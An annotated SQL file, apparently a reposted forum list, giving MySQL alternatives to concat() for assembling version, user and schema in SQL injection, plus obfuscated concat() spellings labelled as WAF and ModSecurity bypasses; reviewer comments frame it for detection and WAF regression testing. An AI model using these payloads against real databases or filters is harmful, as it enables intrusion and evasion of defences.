-- mysql injection concat() replacements
-- Posted by Nytro, November 24, 2015; list credited to @sergey_lakantar.
--
-- Purpose: each SELECT below assembles "version : user [: schema]" from MySQL
-- built-ins other than concat(). The line after each statement is the output
-- as given in the post (not re-verified here).
--
-- Defender's reading: a filter or detection rule keyed on the literal text
-- "concat(" does not cover string assembly inside an injected query, because
-- export_set, make_set, insert, replace, lpad/rpad and
-- group_concat(... separator ...) reach the same result. Filters are defence
-- in depth only; the durable fix is bound parameters, so that user input
-- never becomes SQL text.
--
-- NOTE(review): "--1", "--3" and "@x--length(...)" below are arithmetic
-- (minus a negative value), not comments. MySQL starts a "--" comment only
-- when whitespace follows, so a normaliser that cuts everything after "--"
-- will mis-parse these statements.

-- export_set(): two values joined by the separator argument
select export_set(1,version(),user(),' : ',2);
-- output: 5.1.7 : my_user

-- export_set() nested to add a third value
select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2);
-- output: 5.1.7 : my_user : my_db

-- make_set(): the result is comma-separated
select make_set(7,version(),user(),schema());
-- output: 5.1.7,my_user,my_db

-- make_set() with the commas rewritten by replace()
select replace(make_set(7,version(),user(),schema()),',',' : ');
-- output: 5.1.7 : my_user : my_db

-- insert(): inserts at position length+1, i.e. after the last character
select insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ');
-- output: 5.1.7 : my_user

select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()) ,length(version())--1,0,' : ')),length(schema())--1,0,' : ');
-- output: 5.1.7 : my_user : my_db

-- replace(): placeholder characters in a template literal are substituted
select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user());
-- output: 5.1.7 : my_user

select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema());
-- output: 5.1.7 : my_user : my_db

-- lpad(): left-pads to a computed length; @x holds the running length
-- NOTE(review): this statement was posted without a terminating semicolon.
select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version())
-- output: 5.1.7 : my_user

select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version());
-- output: 5.1.7 : my_user : my_db

-- rpad(): the same construction, padding on the right
select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user());
-- output: 5.1.7 : my_user

select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema());
-- output: 5.1.7 : my_user : my_db

-- group_concat() without comma-
-- The three values are supplied as rows of a UNION, so no argument list is needed.
select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x);
-- output: 5.1.7 : my_user : my_db

-- concat() waf bypass-
-- The lines below are alternative spellings of a concat()/group_concat() call
-- as they would appear in a request, not standalone statements. They vary
-- letter case, quote the name in backticks, place MySQL version-conditional
-- comments (/*!NNNNN ... */), ordinary comments (/**/, "-- ", %23 = "#") and
-- URL-encoded bytes (%0a %0b %0c %0d %a0) between the name and the
-- parenthesis, and nest the call inside { ... } groups (this looks like
-- MySQL's ODBC escape syntax; confirm).
-- For detection: match only after URL-decoding and after normalising the input
-- the way MySQL tokenises it; a pattern on the raw bytes "concat(" is not
-- sufficient. The list is useful as regression cases for a WAF rule set.
-- One entry keeps the line break it has in the post.
/*!50000group_coNcat(*/)
/*!50000coNcat(*/)
`coNcat`%0a%0b%0c%0d%a0()
{snoopdogg concat()}
{s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}}
{s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}}
{s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! 
/*!(*/((((1 %23aaa%0a )))))}}}}}}}}}
concat-- a%0a()
concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a)
concat/**x**/()

-- Modsecurity-
-- NOTE(review): label as posted; the post does not say which ModSecurity rule
-- set or version this entry was checked against.
concat+()

-- Link: concat() replacements - Pastebin.com